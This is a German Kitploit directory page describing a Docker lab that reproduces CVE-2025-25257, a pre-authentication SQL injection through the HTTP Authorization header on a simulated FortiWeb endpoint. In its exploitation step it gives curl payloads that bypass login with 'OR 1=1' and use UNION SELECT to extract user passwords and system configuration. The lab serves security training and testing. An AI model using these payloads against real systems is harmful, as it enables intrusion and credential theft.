Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-25257 — Reproduzierbares Docker-Lab für CVE-2025-25257, das SQL-Injection-Bypass und Datenexfiltration über den HTTP-Authorization-Header auf einem simulierten FortiWeb-Endpunkt demonstriert. | Kitploit
Tools/GitHubGitHub/lytianahkone-boop/cve-2025-25257
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungDatenbanksicherheitLabs & Praxis
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

Reproduzierbares Docker-Lab für CVE-2025-25257, das SQL-Injection-Bypass und Datenexfiltration über den HTTP-Authorization-Header auf einem simulierten FortiWeb-Endpunkt demonstriert.

Repository anzeigen
2vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-25257 - Experimentierumgebung

Architektur des Experiments (die Umgebung simuliert die verwundbaren Komponenten von FortiWeb)

root@kitploit:~
Verwundbarer Endpoint : /api/system/fabric/config
Injektionsvektor : HTTP-Header Authorization: Bearer
Mechanismus : Direkte SQL-Verkettung (Python f-String)
Authentifizierung : Keine (vollständiger Bypass)
Datenbank : SQLite (zu Demonstrationszwecken)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile : absichtlich verwundbarer HTTP-Dienst / stellt eine API ohne Authentifizierung bereit

docker-compose.yml : orchestriert einen reproduzierbaren verwundbaren Dienst / macht die angreifbare API über http zugänglich / isoliert die Experimentierumgebung

requirements.txt : stellt eine stabile und reproduzierbare Umgebung sicher

app.py : implementiert einen Pre-Authentifizierungs-Endpoint / akzeptiert Benutzereingaben über Authorization / verkettet diese Eingabe in eine SQL-Abfrage / ermöglicht Authentifizierungs-Bypass und Datenextraktion

init_db.py : bereitet einen ausnutzbaren Datensatz vor / ermöglicht eine klare Demonstration von Authentifizierungs-Bypass und Datenexfiltration

payload.txt : liefert einen minimalen, kontrollierten und beobachtbaren Proof-of-Concept zur Codeausführung

Schritt 1: Container bauen und starten

Docker-Image bauen

docker-compose build

Container starten

docker-compose up -d

Überprüfen, ob der Container läuft

docker-compose ps

Logs anzeigen

docker-compose logs -f

Schritt 2: Erreichbarkeit des Dienstes prüfen

curl http://localhost:8080/api/system/status

Schritt 3: Ausnutzung der Schwachstelle

Nicht bösartige Anfrage

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

Bösartige SQL-Injektion Bypass mit OR 1=1

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

Datenextraktion mit UNION-SELECT-Injektion

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

Exfiltration sensibler Daten

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

Schritt 4: Bereinigung und Stopp

Container anhalten

docker-compose down

Volumes löschen

docker-compose down -v

Image löschen

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

Tool herunterladen